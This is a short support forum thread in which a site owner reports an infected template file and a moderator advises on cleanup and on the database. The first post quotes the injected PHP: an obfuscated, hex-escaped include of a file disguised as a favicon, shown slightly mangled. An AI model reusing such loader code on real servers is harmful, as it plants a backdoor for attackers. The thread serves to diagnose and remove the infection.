Viewing 5 posts - 1 through 5 (of 5 total)
  • Author

Can you please check my template as it think there is some virus which auto add footer to my template and change the content of the cli/index.php to below code

<?php /6e85d/ @include "x43:ix6eetpx75bwx77wrox6ft/ax64minx69strx61torx2fmodx75lesx2fmodx5fpopx75larx2ffavx69conx5ffc5x3423.x69co"; /6e85d/ echo file_get_contents(‘index.html.bak.bak’);

• This topic was modified 6 years, 7 months ago by  vodanile.
    vodanile Friend

I have scanned again and deleted and replaced the folders but if you have an idea that what might be doing this above change then do let me know. Thanks

Pankaj Sharma Moderator

Hi
    it looks like infected file as there is no such file in the template.
    I suggest you update the JA Extension and template to the latest version and remove the 3rd party extension that you no longer use on site.
    You can also use any security extension from JED to protect your site from hacking.

Regards

vodanile Friend

Is there any way to copy the database without copying the infected files or do i need to simply add and modify the content on the new template and start from scratch? Thanks

Pankaj Sharma Moderator

Hi
    I am not sure if your database is infected or not. If its only the files, in that case, your DB is safe. you can check error report given by your server to check the DB .
    Start from a new site will have fresh DB and you need to configure each part of site again.

Regards

Viewing 5 posts - 1 through 5 (of 5 total)

This topic contains 4 replies, has 2 voices, and was last updated by  Pankaj Sharma 6 years, 7 months ago.

We moved to new unified forum. Please post all new support queries in our New Forum